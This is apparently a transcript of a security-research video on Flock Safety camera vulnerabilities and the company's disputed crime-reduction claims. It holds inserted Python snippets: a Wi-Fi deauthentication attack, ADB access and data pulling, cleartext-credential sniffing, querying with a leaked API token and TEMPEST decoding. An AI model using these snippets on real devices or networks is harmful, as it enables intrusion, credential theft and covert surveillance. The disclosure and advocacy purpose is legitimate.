You may remember me from this video where I told you about 40,000 of these things that your tax dollars pay for that are tracking your every move and repurposing data collected about you every time that you drive past them. Upon further investigation, it turns out that there are over 80,000 of them. And um, we got some and we hacked them. You can press a button a few times on the back of these cameras and within a few minutes, turn them into your own personal spy device or malware host or honeypot that steals people's login credentials
or a cryptocurrency miner, whatever you want, really. Or alternatively, how you can point an antenna at them and decode the video stream using a technique used by the CIA during the Cold War. Or how another researcher found a Google search phrase that could show you the real-time location of these cameras and police patrol cars. This isn't clickbait or an exaggerated claim with no payoff. Just the other day, weeks before this video will be released, US senators and representatives drafted an official letter to open an investigation that highlights the national security risks associated with our findings.
And in this video, I'm going to show you exactly how they work and even demonstrate them to journalists. "No fucking way!" And finally, we're going to take a deep data dive into the efficacy, misinformation, and straight-up lies surrounding some private surveillance startups. And we're going to use that momentum to push for protocols and legislation that actually make you safer. Wow, that's a lot for a YouTube video. The meat and potatoes of this video will be mostly in parity with John Gaines's white paper, which is linked in the description below.
Many of these vulnerabilities were recently published in the National Vulnerability Database or are in the process of publication. And to prevent the average viewer from getting lost or falling asleep, I'm going to keep many of the formalities and extensive details to a minimum. But if you find yourself wanting more details at any time in this video, just check the description for a whole bunch of links. Welcome to the world of responsible disclosure. And while I'm up here, let me tell you that, to the best of my knowledge, all of the cameras and hardware seen in this video were acquired legally.
I have not shared or redistributed any of the data on them, and as long as they are in my possession, they will not be placed into the wild. At no point in time have I knowingly accessed or interfered with any server or service related to or owned by Flock Safety. There is a chance that the devices you see in this video, which we acquired from multiple different sources, are all unique and do not have the same hardware or software as the devices in the wild. I have no idea how or why that would be the case, but it is technically a possibility.
And finally, at the time of me recording this, there are 47 security issues covered, with the vast majority listed in the white paper. In this video, I'm going to be showing you six of them. Over the last summer, when doing research for my first video on this topic, I started poking around to see if anyone had done an independent audit of Flock Safety or related services. This naturally led me to the dark web, where I have access to some semi-private communities dedicated to hacking and open-source intelligence.
Some of these communities have well-organized marketplaces for breached data, credentials, exploits, and all that stuff. And that is where I found this. Please excuse the poor English translation, but these were law enforcement Flock Safety accounts for sale, with escrow protection, by a reputable vendor. And a few days later, the listings were removed in a way that suggested that someone had bought them. Not long after that, I got in touch with a professional security researcher regarding other things on this list, to see what he knew.
He had found something very similar on the dark web. So, in the cyber industry, there are things called access brokers, and some of them specialize in government agencies or maybe local law enforcement. I started digging more to find out where these accounts could have come from. Were they bought or stolen off of a police officer or a Flock employee? Or maybe Flock Safety itself had some security vulnerabilities? The most significant, troublesome, and mind-boggling vulnerability on this list was discovered nearly a year ago.
"In late 2024, I stumbled on a rabbit hole, and then, probably a few nights later, I was messing with the buttons and the DIP switch and was able to figure out how to get a shell on it. Yeah, so I'm John Gaines of GainSec. Professionally, I've been in the offensive security field for over a decade." Obtaining a shell on a device means that you can remotely control it, exfiltrate data, and escalate privileges, which is exactly what John did. As detailed on John's blog and formally published paper,
John had found a user named Cajure on social media who was trying to recreate some of the disclosures. He reported that by merely pressing the button on the back of a Flock Safety camera in a particular sequence, a wireless access point is created. Hey partner, don't do any of this stuff unless you can legally acquire a Flock Safety camera. If you do this to one of the 80,000 all over the US of A, you'll be put in the clink.
First thing you're going to want to do is go ahead and press the button to turn on that police camera. Then press the button on the back a number of times I can't disclose in this video. There she is: the Flock wireless access point. Go on and connect. Send a command to enable ADB. Connect. And now you can connect to the Flock Safety device and access its data.
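For the technically minded, here's a rough sketch of what that last step can look like from a laptop joined to the camera's hotspot, driving the standard adb client from Python. The IP address, port, and paths are generic placeholders I've assumed for illustration, not values taken from an actual Flock device:

```python
# Hedged sketch: talking to an Android device over network ADB once its
# hotspot is joined and ADB has been enabled. All values are placeholders.
import subprocess

DEVICE = "192.168.1.1:5555"  # hypothetical gateway address, default ADB port

# Attach to the device over TCP/IP.
subprocess.run(["adb", "connect", DEVICE], check=True)

# List installed packages; on a camera like this, that would include
# the vendor's custom apps.
subprocess.run(["adb", "-s", DEVICE, "shell", "pm", "list", "packages"], check=True)

# Pull a directory to inspect stored data locally (path is illustrative).
subprocess.run(["adb", "-s", DEVICE, "pull", "/sdcard/", "./camera_dump"], check=True)
```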
Or install whatever the hell you want on it. Have fun. This, along with John's previous discoveries, is encapsulated in an easy-to-use tool that he made, so even a novice user can obtain full control of the camera. We let George Chidi from the Guardian do the honors. "The longest part, actually, is waiting for the hotspot to turn on. Realistically, I'm in within about five seconds." And in fact, with the compute box, you don't need to hit the buttons, because the USB-C ports are exposed.
So you can just plug in a Rubber Ducky and walk away. A Rubber Ducky, sometimes referred to as a BadUSB, is a USB drive that a computer or device detects as a USB keyboard and that then executes scripts called payloads. One can make a device like this for as little as $5. This quite literally raises the limit on how one could use Flock Safety devices to the level of their imagination. You can clone or decompile the apps. You could send the video stream data to a remote server. You could use it as a botnet client for malware.
You could have it capture Wi-Fi handshake credentials and perform man-in-the-middle or honeypot attacks. Or replace or modify captured footage or images. And if that is the case, this could bring into question the integrity of the data being used as admissible evidence in court, in general, unless of course a prosecutor could prove that no security breach had occurred. And about that: "The apps that are installed, the ones custom to the vendor, all have debug enabled,
which on these types of embedded devices means that you can pause them at runtime and modify the memory, right? Which gives you system injection. The system user can write properties, and in this case there's one that you can modify: a cleanup script that is run as root. You can consider it either wireless RCE or a gated wireless RCE that goes from no access to root, which is the worst case." This means that malicious code can be installed and executed outside of the operating system.
So, like when you first turn on a computer and see the BIOS screen where the system does its little self-check: it could exist right there, acting as a superior to Windows or iOS or whatever it is that you're booting into. Multi-factor authentication, or two-factor authentication, or two-step verification, is part of our daily lives. We use it when we log in to everything from Gmail to TikTok to our banks and nearly everything in between. But not all 2FA is equal.
And different types have their own strengths and weaknesses. For example, some 2FA prompts simply pop up on your phone or your desktop and ask you if you've just logged in from a certain device, which you can approve or decline. This is an excellent security protocol if you're sitting at home in Kansas and see that somebody from Bangladesh just used your password. But if I'm sitting in your driveway in Kansas, or especially if I'm targeting your Wi-Fi with a device like this,
I can clone your Wi-Fi signal and then send a deauthentication, or deauth, signal to your device's MAC address. Either you will notice this and try to reconnect, or your computer or phone will automatically reconnect, and now you'd be accessing your own network through my device. I could use a script to clone the login page of whatever service I'm trying to get credentials for and then feed it to you, capturing your session and, depending on the service, your username and password.
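If you're wondering what sending a deauth signal actually looks like, here's a minimal sketch using the Scapy library, assuming a wireless card in monitor mode and a network you're legally allowed to test. The MAC addresses and interface name are made up:

```python
# Hedged sketch: 802.11 deauthentication frames with Scapy. Only for
# networks you own or are authorized to test.
from scapy.all import RadioTap, Dot11, Dot11Deauth, sendp

AP_MAC = "aa:bb:cc:dd:ee:ff"      # hypothetical access point BSSID
CLIENT_MAC = "11:22:33:44:55:66"  # hypothetical victim device

# A deauth frame that claims to come from the AP, addressed to the client.
frame = (RadioTap()
         / Dot11(addr1=CLIENT_MAC, addr2=AP_MAC, addr3=AP_MAC)
         / Dot11Deauth(reason=7))

# Send a burst on the monitor-mode interface; the client drops off and
# typically reconnects automatically, possibly to an evil-twin clone.
sendp(frame, iface="wlan0mon", count=64, inter=0.1)
```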
Then, as expected, you would get a two-step verification prompt asking if you just logged in, and you would say yes, granting me access. This means that when it comes to credentials like this, even with 2FA or MFA, a police surveillance company's security can only be as good as the least security-minded person with access to that system. If you're wondering how low this security bar can go with clients, you'll be disappointed to know that Flock Safety doesn't require two-factor authentication for some police departments.
Yes, you heard that right. The security process you go through when you log into Disney Plus is just too much to ask some police departments to do when accessing confidential information and the location of, in some cases, virtually everyone. When I first found this out, I simply couldn't believe it. And neither could US Senator Wyden's team, which is why it's among the issues leading to a request for the FTC to open an investigation into the company on the grounds of national security. Fortunately, there's a super easy solution to this: a USB or NFC authenticator.
It costs as little as $10, and you just plug it in or wave it in front of your device for the second layer of authentication. And if this is too much hassle for an able-bodied police officer or employee to use, then maybe they shouldn't have access to secure information. It's really frustrating to spend this much time talking about a problem when a very simple, common-sense solution to that problem has existed since day one. A concerning amount of hard-coded information is stored inside Flock Safety cameras,
and we'll hear all about it in the next vulnerabilities on this list. But within this information is a list of Wi-Fi network names. So I set up a dummy network with one of these Wi-Fi names. Then, when I removed the SIM card, or when the device couldn't find an LTE signal, some of our Flock Safety cameras happily connected to the dummy network and routed upstream traffic through it. Others seemingly prioritized my dummy network by default, regardless of whether they had a SIM card or not. So I captured the pcap data being transmitted from one of these cameras for a little while and analyzed it with Wireshark and an open-source extraction suite. And sure enough, there were cleartext credentials in the data.
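For a sense of how little effort that last step takes, here's a hedged sketch of the kind of keyword sweep that surfaces cleartext credentials in a capture like this. The file name and keywords are illustrative, not the actual ones from the research:

```python
# Hedged sketch: sweep a packet capture for strings that should never
# appear unencrypted on the wire.
from scapy.all import rdpcap, TCP, Raw

packets = rdpcap("camera_upstream.pcap")  # hypothetical capture file

KEYWORDS = (b"password", b"passwd", b"Authorization: Basic", b"api_key")

for pkt in packets:
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        payload = bytes(pkt[Raw].load)
        if any(k in payload for k in KEYWORDS):
            # Anything that matches here crossed the network in cleartext.
            print(pkt.summary())
            print(payload[:120])
```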
These exact vulnerabilities were originally disclosed by John in April, another in September, and another is pending. This attack requires knowing the names or credentials of the Wi-Fi networks the camera is looking for. But what concerns me more is that this information wasn't encrypted upstream to begin with, which means that by using a professional-grade SDR or IMSI catcher, which is more or less a DIY Stingray device, a malicious hacker could just hijack the LTE connection and then do the exact same thing without needing to know these network names, or even be physically near the camera. This could also allow a more modern version of a TEMPEST attack, which I'll demonstrate in a few minutes, where a hacker could decode the Motion JPEG video stream. I actually tried to accomplish this, as I love puzzles, but unfortunately time forced me to choose between decoding the pixel sequence or finishing this video. And here we are. When I recreated John's research on these devices, as previously shown, it was as clear to me as it was to John when he first discovered it that they inadequately protected credentials, API keys, passwords, and more. As I mentioned, the GainSec blog and the papers have a lot more details on this for the technically minded, but I'm going to use this segment to talk about some of the other troubling things that were found stored in the camera. On Flock Safety's website,
it is stated that they do not capture or record data on people, only vehicles. They also state that data and footage are encrypted throughout the entire life cycle, and that data is automatically removed from devices after seven days. Speaking for myself, when I recreated John's research across multiple devices, I confirmed exactly what he was seeing. If Flock Safety's cameras in the wild are operating like the ones we researched,
this would be a clear contradiction of their statements. Firstly, when I moved in front of the camera, the radar module triggered the camera module to take a picture of me. Then the onboard AI looked for a license plate and didn't find one, but it stored the image anyway in a separate folder. Now, this doesn't specifically target people; it will also take a picture of my hand if I move it in front of the lens, or a picture of my desk if I move the device. But what I observed was the devices intentionally saving the footage,
not erasing it. Secondly, throughout the entire process of verifying John's research, I didn't crack or decrypt a single thing. All of the information, footage, and data that you see or hear about in this video was unencrypted at runtime. And finally, when going through the files and temp folders of the Falcon cameras, we absolutely found images older than seven days. In fact, John found stored images that were captured when the camera was triggered inside the
factory where the device was made. So, hypothetically, this suggests that if you had a camera deployed and pointed at your front door, one could access this data and figure out when you entered or exited your house. For about as long as modern search engines have existed, so has dorking. Googling looks like this, and dorking looks like this.
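Since you can't see my screen here, a rough illustration of the difference, with generic queries I've made up rather than the actual searches from the video:

```python
# Hedged illustration: plain googling vs. dorking with search operators
# that surface pages nobody meant to have indexed. Queries are generic.
ordinary_search = "flock safety demo"

dorks = [
    'site:flocksafety.com inurl:demo',  # restrict results to one domain
    'intitle:"index of" backup',        # exposed directory listings
    'filetype:env "API_KEY"',           # config files leaking secrets
]
```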
And if you're really well versed in dorking, you'll start finding things that weren't necessarily intended to be public. I'm a pretty solid dorker, and I use it constantly when researching videos like this one. Josh, however, is a legitimate expert at dorking. "I'm Josh Remykel. I'm a technology obsessive, and I founded next into AI, an all-source intelligence firm focusing on privacy and personal cybersecurity. This is the exact Google search I used to find an exposed Flock Safety demo site that could trace cars, map patrol vehicles, and build full investigation profiles on people. At first glance, it was a UI demo site meant to just show off how cool their buttons look. As I looked deeper, it contained 5,000 lines of source code for a search platform. Buried in the code was a live API key." API stands for application programming interface, which basically allows a computer to contact another computer without having to deal with all the
clunky things like user interfaces and buttons. The confidentiality of API keys and tokens like this is sometimes more important than that of usernames and passwords, because in many cases the token alone grants you the same access, but without front-end security measures like CAPTCHA or two-step verification.
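To make that concrete, here's a hedged sketch of why a bare token is all the login an attacker needs against a geospatial platform like ArcGIS, whose feature layers are queried over plain REST. The URL and token are placeholders, not the ones Josh found:

```python
# Hedged sketch: querying an ArcGIS feature layer with nothing but a
# leaked token. Endpoint and token are invented placeholders.
import requests

url = ("https://services.arcgis.com/EXAMPLE/arcgis/rest/services/"
       "patrol_vehicles/FeatureServer/0/query")
params = {
    "where": "1=1",       # return every record in the layer
    "outFields": "*",
    "f": "json",
    "token": "LEAKED_API_KEY_HERE",  # no CAPTCHA, no 2FA, no username
}
records = requests.get(url, params=params, timeout=30).json()
print(len(records.get("features", [])))
```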
"It had access to over 50 private layers that I didn't dare touch, because I'm too handsome for prison. I used open-source intelligence to see what data is stored in ArcGIS." Let me show you some of the things I found that police departments and Flock Safety are storing on ArcGIS. This Flock Safety map is obviously a demo, but it shows that they store registration data: names, emails, how many cameras, and a field to attach files, whatever that may be. Carrollton Police Department, and this is no good: an exposed API key may have granted access to track live patrol car locations. Also on the naughty list is Aurora, Colorado, or maybe Flock Safety; I don't actually know who owns this map.
It's Flock Safety, leaking another ArcGIS layer with officers' names, phone numbers, emails, and even their expected patrol areas. The worst one comes out of Dallas, Texas: a map layer with 6,000 records of hot-list alerts containing license plates, the reasons why they're on that list, the exact locations detected, the cameras that caught them, and the times that they went by. Anyone who could Google could find this map and trace these people's movement patterns for five months.
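And tracing movement patterns from a layer like that takes embarrassingly little work. A sketch with invented column names, assuming the layer's records have been exported:

```python
# Hedged sketch: one detection per row (plate, reason, location, camera,
# timestamp) is all it takes to reconstruct someone's movements.
import pandas as pd

hits = pd.read_json("hotlist_layer.json")  # hypothetical export of the layer

hits["time"] = pd.to_datetime(hits["time"])
for plate, track in hits.sort_values("time").groupby("plate"):
    print(plate)
    print(track[["time", "camera_id", "lat", "lon"]].head())
```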
Also going to note: the reason category has someone in there for just "suspect," and a bunch of others literally have no reason and are blank. So let's back up for a second. If you call 911 and the dispatcher deems it an emergency requiring police, most modern police cars have a GPS module installed that reports back to dispatch. That way, they can efficiently contact the police nearest the event and expedite the response time. Flock Safety and many of its clients use third-party services that make sense of this constant
stream of data, and all of that data is handled with an API. Just a few weeks ago, two security researchers, Alexa Feminawa and James Zhang, wrote a report revealing that ArcGIS had been compromised by a Chinese state-sponsored hacking group called Flax Typhoon. The report from Infosecurity Magazine states the hackers allegedly targeted a legitimate public-facing ArcGIS application. This is software that allows organizations to manage spatial data for disaster
recovery, emergency management, and other critical functions. This is just a very recent example of what could be compromised with sensitive API information for geospatial platforms. In real-world scenarios, this is probably the least concerning vulnerability in this video, but it's one of the most fascinating, and very few consumer camera, display, or network-equipment manufacturers have the means or know-how to test for it. At some level, this device
that you're watching this video on is leaking non-ionizing electromagnetic radiation, and if the R word is unsettling, non-ionizing means no DNA damage. Phones leak it, monitors leak it, microphones leak it, camera modules leak it, most modern electronic devices leak it. But some of these leaking electromagnetic waves are resonating and modulating in parity with the signal, and if you can isolate the resonating frequencies you can, with a lot of trial and error,
decode the signal, or in other words, spy on the device. The TEMPEST attack is something that the CIA and NSA have used and experimented with ever since World War II, which is how it got its cool-sounding name. Back when we all used CRT televisions and monitors, there was generally a whole lot more RF leakage, so it was a much bigger risk to national security. These days, a practical TEMPEST attack would involve spending some time finding and decoding the signal, and then placing an RF bug on or near the source, which could transmit the data remotely. You need a software-defined radio with a lot of bandwidth, RF probes, a directional antenna, and a spectrum analyzer. On the newer Flock Safety cameras, I noticed that there was an unusual amount of RF leakage coming from the camera module itself, the proprietary coaxial port, and the eight-pin DIN port on the back. Initially, using an RF probing kit, an oscilloscope, a spectrum analyzer, and a HackRF, I was able to isolate a few ranges of modulated signals. Then I brought the camera into another room to rule out localized interference and tested these signals, as well as common integer quotients of those frequencies. Using an RF probe, I found an exploitable leak between 592 and 594 megahertz. Then, using a log-periodic antenna and a 20-decibel low-noise amplifier, I was able to point the RF gun at the device from as far as 6 feet away and make out what the camera was capturing. In this case: me. Obviously the quality and lack of color leave a lot to be desired, but that's just because the software-defined radio I was using to pick this up didn't have the bandwidth for that kind of quality. If someone were to use a professional-grade multi-channel SDR board with higher-resolution sample rates, the quality of the TEMPEST attack's output can be nearly as good as its source.
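For a feel of the signal-processing core of the attack, here's a heavily simplified sketch: AM-demodulate the captured IQ samples and fold them into a 2-D image using guessed line timing. The sample rate, file name, and timing values are invented, and a real attempt involves a lot of trial and error:

```python
# Hedged sketch of TEMPEST-style video recovery from an RF capture.
import numpy as np

fs = 20_000_000                       # hypothetical 20 MS/s capture rate
iq = np.fromfile("leak_593mhz.iq", dtype=np.complex64)

envelope = np.abs(iq)                 # AM demodulation: magnitude of IQ
envelope -= envelope.mean()           # remove the DC offset

# Guess at the line length in samples; in practice found by trial and error.
samples_per_line = 1280
n_lines = len(envelope) // samples_per_line
frame = envelope[: n_lines * samples_per_line].reshape(n_lines, samples_per_line)

# Normalize to 8-bit grayscale; wrong timing shows up as skew or rolling.
img = ((frame - frame.min()) / (np.ptp(frame) + 1e-12) * 255).astype(np.uint8)
```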
But due to the high cost of the equipment and the knowledge and time required to execute an attack like this, most consumer device manufacturers and owners do not need to be super worried about it. However, if a device is being used for something related to national security, government use, or public surveillance, this absolutely needs to be protected against. This is just my opinion here, but most of these issues are entirely preventable and are the result of prioritizing growth over painfully obvious, industry-standard security measures like
multi-factor authentication. Another really obvious piece of low-hanging fruit here is using mobile-phone operating systems and hardware for a government surveillance camera. The Falcon, the Sparrow, and likely the Flex LPR devices (the cameras you most commonly see all over the country) were running Android Things 8 or 8.1, which was discontinued in 2021, and that includes security updates. At this time, there are over 900 published vulnerabilities for this OS. Like, someone please
explain to me why there are even cameras in the wild recording public activity that aren't running on supported software. If your phone or computer or home security system stopped being supported and you understood how bad this could make your life, you'd probably be inclined to throw them in the garbage. The way this is supposed to work is that when you discover a vulnerability, you attempt to reach out to the company and you give them a 90-day window to release a patch.
No shout-out, reward, compensation, or bounty is required; however, after those 90 days pass, the discoverer can then post a detailed write-up. Alternatively, some go the bug-bounty route, where you report it and get a monetary or reputational reward. However, as explained by John and Josh, this route has commonly started to include non-disclosure agreements. This means that even if the company decides not to pay a reward, the discoverer cannot legally disclose the issue publicly.
"So they did offer me a bug bounty. It wasn't very specific and included an NDA prohibiting me from disclosing anything more. And I don't think you're going to improve cybersecurity as a whole if you cannot talk about it. In early February I reached out. I disclosed, I don't want to say, seven or twelve vulnerabilities for the license plate reader and the gunshot detection. They responded within like a day and a half and immediately asked for a video chat, which I did, you know, talking about joint PR statements and so on and so forth. What ended up happening was they released a PR statement about a month and a half before the three months ended, so fairly quickly, without telling me, without referencing me, and without referencing the issues that I ended up publishing. They also never gave me any confirmation that anything was fixed." There's something really unnerving about going on record with legislators or media and talking about national security. I don't fully understand what defines a threat to
national security, and it seems like the type of topic where you don't want to make any mistakes. So I just didn't mention it and kept that term out of my mouth, and I simply provided our research to those who could. And according to Oregon Senator Wyden and Illinois Representative Krishnamoorthi, well, in their words, Flock has "unnecessarily exposed Americans' sensitive personal data to theft by hackers and foreign spies." Part of my research was trying to figure out just how effective
the adoption of Flock Safety and similar ALPR services has been at reducing crime rates or increasing crime clearance rates, and this is a deceptively difficult task. For example, let's do what most people conveniently do these days: ask Google and let AI answer it for us. Well, hey, there you have it. Let's maybe look at those actual sources, though. By the way, I want to take a moment to congratulate Flock Safety on their search engine optimization skills. It's so good
that even services that exist only to help companies improve their SEO are like, bro, sorry, it's literally impossible to improve beyond your current ranking. This means that whenever you want to find information about Flock Safety or ALPRs or police cameras, Flock is going to be the most prominent and influential force in your initial results, and subsequently so will the AI assistant's answer be. More on that hellscape in a future video. But hey, look, some studies. Let's check them out.
Okay, so only two of these studies took place after Flock Safety was even incorporated, and they tell us nothing about the efficacy of surveillance or data collection. Flock Safety's website claims that 10% of all crime in America is solved using their services, which is a pretty impressive thing to brag about. However, the source they cite for this claim is a research paper created by two Flock Safety employees that doesn't really outline regional analysis. In other words, crime has
been dropping nationally in America since 2021, even in the last year. The first thing that I personally would want to look for is a crime rate and clearance comparison between cities that use Flock safety services and cities that do not. And when you do it that way, it's extremely difficult to find any meaningful changes related to surveillance technology in general. But there have been other studies not directly related to the surveillance industry. The National Policing Institute did
a multi-site evaluation and said that license plate readers can improve public safety, but the technology's impact depends on its implementation. It could just be me, but this sounds quite a bit different from what Flock's CEO is saying: "Over 5,000 cities leverage Flock to solve north of 14% of all crimes in America. But Flock's story is an awareness story. We can now rest assured that if a crime happens in South Downtown, it will be solved." It wasn't.
In 2023, the Berkeley Police Accountability Board did some data diving and found that ALPRs in other California communities were sometimes more correlated with increases in vehicle theft and lower crime clearance rates. In the case of Bakersfield, California, it was only after ALPRs were installed that the city rose to have the highest motor vehicle theft rate in the United States. The board also noticed that Flock Safety had claimed their services were responsible for a 33%
decrease in motor vehicle thefts in Vacaville, California, but were citing data from years before the cameras were even installed. Which brings us to Oakland, California. And in full transparency, I've been informally consulting with and sharing some of this research with their city council, who had just delayed a vote on a $2.25 million expansion to its Flock Safety network. Flock Safety's public website claims that their services helped Oakland's violent crime clearance rate rise by 11%. Not bad. Well, actually, kind of bad, because they failed to mention that violent crime decreased by 19% in that period, which is on par with the FBI crime stats for the entire country. They also conveniently failed to mention that in 2023 Oakland reported a violent crime clearance rate of 3%, which was a pretty big news story last year, and that the Oakland Police Department themselves later acknowledged and confirmed that figure to be an error.
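To see why an 11% rise in clearance rate can mean less than it sounds like when crime itself fell 19%, here's some back-of-the-napkin arithmetic with invented numbers:

```python
# Hedged arithmetic: a clearance rate can "rise" purely because crime fell.
# These numbers are invented to show the shape of the problem.
crimes_before, cleared_before = 1000, 100  # 10.0% clearance rate
crimes_after,  cleared_after  =  810,  90  # crime down 19%

rate_before = cleared_before / crimes_before  # 0.100
rate_after  = cleared_after / crimes_after    # ~0.111, an "11% rise"
print(rate_before, rate_after)
```

The rate went up purely because the denominator shrank; in this made-up example, ten fewer crimes were actually solved.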
So how are so many cities like this failing to call bullshit on these types of claims, claims that may result in millions of tax dollars being spent on these services? This is what I keep running into again and again when researching the efficacy of police surveillance technology: a private business will cite statistics that are often misleading, and somehow nobody from these cities or police departments seems to have validated the information quoted in the sales pitches. So, all of this aside, even if we're not considering all of these questionable data sources
in marketing, sociology is an incredibly chaotic field of study, one that typically requires decades of adeptly sourced data to accurately suggest whether a technology or a policy change reduces crime. For decades, we've been trying to figure out whether an increase in police can even reduce crime. So, at the very least, there should be an independent, robust meta-analysis to figure out how effective private surveillance and data sharing are before we take money away from other
resources to pay for it, right? And without getting too philosophical here, it is worth considering for a second that catching people committing crimes is very different from deterring antisocial or criminal events. A thief or a serial killer or a drug dealer or a drug addict is not going to see a bunch of police cameras, tap out from crime, and become a plumber; they're just going to commit crimes in a more obfuscated way, which more often than not complicates the process
of finding a reformative solution. By the way, what an exhausting number of sociology studies have figured out over the last 50 years is that high levels of surveillance drastically decrease well-being, morale, and even workplace productivity. If you think about that for a moment, it shouldn't really surprise anyone. If you have a job where you think your superiors are constantly watching you and judging your every move, you'll be concerned with appearing to be productive instead of learning and developing your skills at your natural speed. Or consider this recent study that
strongly suggests that high levels of surveillance cause a steep decline in voluntary visual processing, meaning that it quite literally impairs the brain's ability to process and recognize human faces. And once again, this is one of those things that you hear and you're like, what? But when you think about it, it's not all that surprising. When you feel like you're in an environment where you are intrinsically not trusted, you're going to be far less likely to make friendly or meaningful
social connections with others. And I'm sorry, but that just doesn't sound anything like a safe environment to me. And that's on top of an exhaustive number of studies outlining exactly how and why increased surveillance decreases well-being and mental health. But some people seemingly only read the studies conducted by companies trying to sell them something. Meet Mike Johnston, the Mayor of Denver. At first, it seemed like he had the same careful agnosticism about Flock Safety cameras that many researchers have. "Our Flock cameras are shut off
to every federal agency, everyone outside the state of Colorado, everyone outside the City and County of Denver, and no one can access them other than Denver Police Department officers." You could interpret all of the research that I showed you in this video however you like, but the way I interpreted it, it technically demonstrated and proved that statement to be false. But guys, don't worry about this. "Could a federal law enforcement agency use this database to
track someone down on an ICE hold and arrest them? No, because the system was not designed to do that." In just over a year of usage data from Denver's Flock Safety services, queries openly admitting to being used for immigration enforcement amounted to over 1,800. Mike even warns us of the grave dangers of cutting this data off from external communities: "I want to be clear that this is a risk to public
safety. If you have someone that commits a crime in Lakewood and flees into Denver, they will not be able to find that person in Denver. We had a trans woman who was kidnapped and murdered, picked up in Denver, murdered in Lakewood. We solved that crime because Denver and Lakewood could talk to each other across a Flock camera database." Except that didn't happen at all. He's referring to the death of Jax Gratton, which was not a solved murder. Jax's mother was more than happy to speak
her mind about this: "I'm shocked and appalled that a public official would use my daughter and claim that Flock had anything to do with her body being found." Fortunately, as a result of all of this bullshit and citizen backlash, the Denver City Council overwhelmingly voted to not renew the Flock Safety contract. And in their council letter on the issue, they went as far as calling out
Flock Safety's ethics and credibility. And I quote: "We do not believe that the City and County of Denver should continue doing business with a company that has demonstrated such disregard for honesty and accountability." Whoa, now hold on. Before you celebrate your renewed faith in humanity: Mayor Mike Johnston sidestepped the city council and signed the Flock Safety contract anyway, which council members are now calling a backroom deal with a known bad actor. And all of this
happened just in time for police to drive out from Columbine Valley, Colorado, to knock on a woman's door in Denver with a summons wrongfully accusing her of stealing a package off of someone's porch. Any guesses on what technology they cited as evidence? Flock cameras. "You know we have cameras in that town. You can't get a breath of fresh air in or out of that place without us knowing, correct?" To be fair, that seems like a pretty safe prison city. While the officer refused to look at the overwhelming dashcam, porch-camera, and Google Maps evidence
exonerating the woman, fortunately the police chief eventually did. But this makes one ponder: what's the result when this happens to a 19-year-old Black dude? Notably, this year, people and communities across the United States have been increasingly concerned about or opposed to the rapid expansion of private surveillance in their communities. A lot of people have been noticing more and more of these little black cameras with the solar panels and just assumed that they were innocently monitoring traffic flow, or maybe giving a dispatcher a better idea of
who or what to send to deal with an accident. But now they're finding out what these cameras do and what they're capable of doing, and a lot of people are just like, yeah, f*** that. And now, every few days, I hear about another city pushing back and deciding to take down Flock Safety cameras. However, in some cases, a city formally deciding that it no longer wants Flock Safety services or cameras somehow doesn't result in them going away. After finding out that ICE was using their cameras without their
knowledge or consent, the Chicago suburb of Evanston decided that they wanted them removed. So Flock Safety then reinstalled most of them. And since you can't own a Flock Safety device, only lease it, the city or police department would be handling, and potentially damaging, private property by removing them. So now Evanston, Illinois, is spending tax dollars on legal expenses for cease-and-desist letters and on covering the cameras with plastic sheeting to protect residents from being tracked by them. But my previous video about this topic came way too late; organizations like
Lucy Parsons Labs and Sassy South have been pushing back for years. Another great example is Will Freeman, a software engineer who started DeFlock last year. "Around a year ago, I was taking a road trip from Seattle to Huntsville, Alabama, and I ran into so many of these along the way in these really small towns. I wanted to do what most cities weren't doing and actually tell people what these things are, where they are, and how many there are." Will is more or
less simply trying to keep a map and publicly accessible record of deployed cameras. I think this is something that both local governments and Flock Safety should already be doing, and you'd probably have a hard time finding anyone who disagrees with that, right? "I'd never gotten a cease-and-desist before. But luckily, before this even happened, the EFF had reached out via email and just said that they were there if I needed anything. So
I reached out to them, and then they were able to send a response, actually two responses because they're lawyers, and we got another letter back saying, basically, we don't care, we think you're wrong anyway." Flock's cease-and-desist here was pertaining to trademark, which in my opinion seems like an absurdly frivolous way to try and bully someone into taking down a website that simply provides the public with some transparency about surveillance that their tax dollars pay for. But Garrett Langley,
the founder and CEO of Flock Safety, doesn't see it this way: "And then, unfortunately, there's terrorist organizations like DeFlock, whose primary motivation is chaos. They are closer to Antifa than they are anything else." I mean, where do you even begin with this? Firstly, if you're going to live-action role-play The Dark Knight, at least watch the movie up until the point where Lucius Fox and Batman both agree that their mass surveillance system is grossly unethical and intentionally destroy it. Secondly, using buzzwords like Antifa doesn't exactly invite
rational or good-faith discourse. You trolled this guy with legal demands and then publicly accused him of being a terrorist. But here's the key takeaway of this interview for me: "But that's why we have a democratically elected process. Right? Like, we're not forcing Flock on anyone." Let me make something clear. My little farm here is not exactly in a dense urban environment. We don't even have sidewalks. I literally cannot leave my neighborhood to go get groceries or ship out a package without passing a Flock camera and having my activities logged into a database that is
shared with a much larger regional database. I am not allowed to know who has access to this information. The people sharing my local information regionally, or even nationally, most likely do not know exactly who has access to it. I didn't sign up for Flock Safety. I never consented to it. I've never had an opportunity to vote on it. I do not have the option to opt out of it. And then, after researching and taking some pictures of the cameras that are constantly photographing me and seeking more information about them, I coincidentally get cops in my driveway, waking my
family members up, asking weird questions, and freaking my neighbors out. Now I'm shelving educational video projects to pay attorneys, and I constantly have to make sure someone is around to take care of my animals, because every day I'm not sure if I'm going to be fucking detained for literally not breaking a single law. "We're not forcing Flock on anyone" lacks so much perspective and is packed with so much delusion and cognitive dissonance that even a Forbes senior editor can't manage to keep a straight face through the sentence. "We're not forcing Flock on anyone."
"Hey, Colin." "Hey, can I help you?" Here are just a few of the many strange events regularly happening at Ben's home and lab this month that may or may not be associated with this video. "That's a maybe, and, like, what the fuck are you doing?" "What? All the neighbors are freaked out." "I think he's just recording a video." "Would it be legal if I took my
Glock out?" Let's just be honest for a second and state the obvious: these cameras aren't exactly little impenetrable fortresses. They're plastic Android cameras and compute boxes mounted seven feet off the ground with hose clamps. And in many cases, they can be found in semi-rural areas where one has trouble finding a stop sign that doesn't have bullet holes in it. And there are a whole lot of people who absolutely despise these cameras. But we're being patient and we're taking the high
road. We're asking our local, state, and federal governments not to throw our tax dollars at a fast-scaling tech startup before adequately researching the risks and rewards, and especially before vetting the hardware and software services that are harvesting our information. It might seem like my research and videos on this topic are anti-Flock. And to some degree, because of delusional shit like this, they are. But we also shouldn't deny that there's a long list of companies trying
